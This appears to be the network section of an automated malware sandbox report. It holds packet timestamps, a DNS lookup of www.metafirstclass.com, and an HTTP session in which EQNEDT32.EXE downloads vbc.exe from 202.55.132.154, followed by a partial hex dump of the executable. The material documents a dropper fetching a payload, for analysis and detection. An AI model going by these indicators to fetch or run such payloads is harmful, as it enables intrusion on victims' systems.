                                    Nov 25, 2021 19:29:23.081511974 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081512928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081528902 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081537962 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081547022 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081562996 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081562996 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081578970 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081587076 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081599951 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081610918 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081615925 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081629992 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081630945 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081644058 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081653118 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081661940 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081674099 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081677914 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081692934 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081695080 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.081722021 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.081746101 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086185932 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086214066 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086236000 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086260080 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086282015 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086299896 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086317062 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086318970 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086338997 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086339951 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086368084 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086369991 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086395979 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086409092 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086419106 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086426973 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086445093 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086452961 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086463928 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086476088 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086481094 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086498976 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086498976 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086518049 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086522102 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086540937 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086549044 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086563110 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086572886 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086582899 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086594105 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086601019 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086616039 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086630106 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086637974 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086648941 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086675882 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086680889 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086685896 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086704016 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086719036 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086721897 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086738110 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086740971 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086755991 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086759090 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086780071 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086781979 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086801052 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086803913 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086824894 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086826086 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086848974 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086853027 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086872101 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086874962 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086898088 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086910009 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086922884 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086935997 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086950064 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086961031 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.086977959 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.086986065 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087009907 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087011099 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087033033 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087035894 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087054014 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087059021 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087075949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087085962 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087099075 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087106943 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087121010 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087125063 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087146044 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087146044 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087167025 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087176085 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087191105 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087194920 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087213039 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087218046 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087234974 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087239981 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087256908 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087265968 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087280989 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087285042 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087304115 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087308884 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087327957 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087330103 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087352991 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087357044 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087373972 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087378025 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087393999 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087402105 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087414980 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087423086 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087435961 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.087444067 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087462902 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.087485075 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.099132061 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.100948095 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308770895 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308805943 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308829069 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308854103 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308867931 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308882952 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308887005 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308892965 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308911085 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308919907 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308938980 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308943987 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308965921 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308969021 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.308988094 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.308991909 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309010029 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309022903 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309037924 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309046984 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309062004 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309083939 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309084892 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309107065 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309109926 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309130907 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309134007 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309156895 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309165001 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309180975 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309190989 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309196949 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309206963 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309230089 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309231997 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309252024 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309252977 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309274912 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309293032 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309295893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309319019 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309325933 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309340000 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309341908 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309364080 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309366941 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309385061 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309391975 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309407949 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309411049 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309431076 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309436083 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309452057 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309458017 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309477091 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309478998 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309500933 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309510946 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309525967 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309535027 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309547901 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309557915 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309571028 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309577942 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309592009 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309601068 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309614897 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309623003 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309636116 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309644938 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309659004 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309667110 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309680939 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309689999 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309701920 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309710026 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309724092 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309735060 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309745073 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309751034 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309767008 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309772968 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309789896 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309798956 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309813023 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309819937 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309834957 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309839010 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309856892 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309865952 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309881926 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309886932 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309905052 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309911013 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309926987 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309931040 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309950113 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309953928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309973001 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.309979916 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.309993982 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310003042 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310015917 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310022116 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310039043 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310045004 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310060024 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310070038 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310081959 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310087919 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310103893 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310112953 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310126066 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310133934 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310157061 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310164928 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310178995 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310189009 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310200930 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310213089 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310223103 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310235023 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310244083 CET8049165202.55.132.154192.168.2.22
                                    Nov 25, 2021 19:29:23.310246944 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310272932 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:23.310297012 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:29:24.526784897 CET4916580192.168.2.22202.55.132.154
                                    Nov 25, 2021 19:30:53.633594036 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:53.789338112 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:53.789490938 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:53.961179972 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.116238117 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116276979 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116292000 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116306067 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116322994 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116336107 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116368055 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116385937 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116401911 CET804916752.128.23.153192.168.2.22
                                    Nov 25, 2021 19:30:54.116539001 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.120157957 CET4916780192.168.2.2252.128.23.153
                                    Nov 25, 2021 19:30:54.208468914 CET4916780192.168.2.2252.128.23.153

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 25, 2021 19:30:53.426491022 CET5216753192.168.2.228.8.8.8
                                    Nov 25, 2021 19:30:53.621328115 CET53521678.8.8.8192.168.2.22

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Nov 25, 2021 19:30:53.426491022 CET192.168.2.228.8.8.80xc18cStandard query (0)www.metafirstclass.comA (IP address)IN (0x0001)

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Nov 25, 2021 19:30:53.621328115 CET8.8.8.8192.168.2.220xc18cNo error (0)www.metafirstclass.com52.128.23.153A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • 202.55.132.154
                                    • www.metafirstclass.com

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249165202.55.132.15480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                    TimestampkBytes transferredDirectionData
                                    Nov 25, 2021 19:29:20.959091902 CET0OUTGET /384500000_1/vbc.exe HTTP/1.1
                                    Accept: */*
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: 202.55.132.154
                                    Connection: Keep-Alive
                                    Nov 25, 2021 19:29:21.195264101 CET1INHTTP/1.1 200 OK
                                    Date: Thu, 25 Nov 2021 18:29:20 GMT
                                    Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31
                                    Last-Modified: Thu, 25 Nov 2021 04:42:24 GMT
                                    ETag: "b0a00-5d19599d2da5b"
                                    Accept-Ranges: bytes
                                    Content-Length: 723456
                                    Keep-Alive: timeout=5, max=100
                                    Connection: Keep-Alive
                                    Content-Type: application/x-msdownload
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 30 14 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 0a 00 00 0a 00 00 00 00 00 00 7e 1d 0b 00 00 20 00 00 00 20 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 1d 0b 00 4f 00 00 00 00 20 0b 00 88 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 dc fd 0a 00 00 20 00 00 00 fe 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 88 06 00 00 00 20 0b 00 00 08 00 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 0b 00 00 02 00 00 00 08 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 1d 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 b0 21 01 00 03 00 00 00 8c 01 00 06 5c 6a 02 00 d0 b2 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23
